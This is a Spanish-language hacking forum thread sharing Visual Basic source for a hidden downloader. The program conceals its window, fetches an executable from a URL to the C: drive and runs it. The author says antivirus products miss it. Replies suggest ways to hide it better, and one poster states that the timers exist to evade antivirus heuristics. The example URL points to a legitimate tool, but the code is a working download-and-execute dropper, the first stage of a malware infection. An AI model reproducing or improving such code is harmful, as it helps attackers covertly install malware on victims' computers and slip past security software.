Autor
|
Tema: mini y simple donwloader ejemplo (Leído 3,801 veces)
|
?¿?
|
buenas, queria compartir un codigo sin fines maleficos simplemente para demostrar que se puede hacer aunque algunos firewalls lo detecten. kav, nod32, panda, avg, norton, mcafee, etc, no lo detectan, firewalls ya no se, pero mi fw xp no lo detecta por lo menos, saludos, aquí dejo el codigo. Dim ejecutar As Long Dim download As Long Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Sub Form_Load() Me.Hide End Sub
Private Sub Timer1_Timer() Me.Visible = False download = URLDownloadToFile(0, "http://download.hijackthis.eu/HJTInstall.exe", "c:\ejemplohijackthis.exe", 0, 0) Timer1.Enabled = False End Sub
Private Sub Timer2_Timer() ejecutar = ShellExecute(Me.hwnd, "Open", "c:\ejemplohijackthis.exe", "", "", 1) Timer2.Enabled = False End Sub
Private Sub Timer3_Timer() Unload Me End Sub comenten, den ideas, opinen pero no falten al respeto, solo pido que se trate con el mismo respeto, gracias.
|
|
|
|
|
|
|
WestOn
El testamento Maya...
|
comenten, den ideas, opinen pero no falten al respeto, solo pido que se trate con el mismo respeto, gracias. ¿Quien te ha faltado al respeto anteriormente?.. ¿Eres......? xD un saludo PD:Yo le pondria el Me.visible = false en el Form_load() y los tiempos de los timers
|
|
« Última modificación: 14 Noviembre 2008, 20:35 pm por WestOn »
|
|
En mi cabeza existe una barrera espacio-tiempo de 4cm³. ¿Alguien sabe como eliminarla?.
|
|
|
|
|
WestOn
El testamento Maya...
|
no te alteres hombre q no es para tanto, puedes hacer lo q kieras respecto a tu code... PD:Yo no me comeria la cabeza en camuflar ese code
|
|
|
|
En mi cabeza existe una barrera espacio-tiempo de 4cm³. ¿Alguien sabe como eliminarla?.
|
|
|
s E t H
Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.
|
o entiendo para que usas los timers.. si la idea es hacer una pausa podes usar esto: Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
|
|
|
|
|
|
|
seba123neo
|
mmm la api Sleep no devuelve el control de la aplicacion (en este caso ya se que no importa) pero trata de usar la funcion Timer con DoEvents o la api GetTickCount que no son como la Sleep que te "traba" todo...
saludos.
|
|
|
|
|
|
|
Zeroql
Todo lo k sucede sucede por una razon
|
es sencillo pero eficiente el code solo faltan algunos ajistes y te keda perfecto.
|
|
|
|
Dime y lo olvido, enseñame y lo recuerdo, involucrame y lo aprendo. /.-ZEROQL.-\ ----- #937675#
|
|
|
~~
|
No entiendo para que usas los timers.. si la idea es hacer una pausa podes usar esto No es para hacer ninguna pausa, es para eludir la eurística, no esty seguro de que un slepp funcionase para eso..
|
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |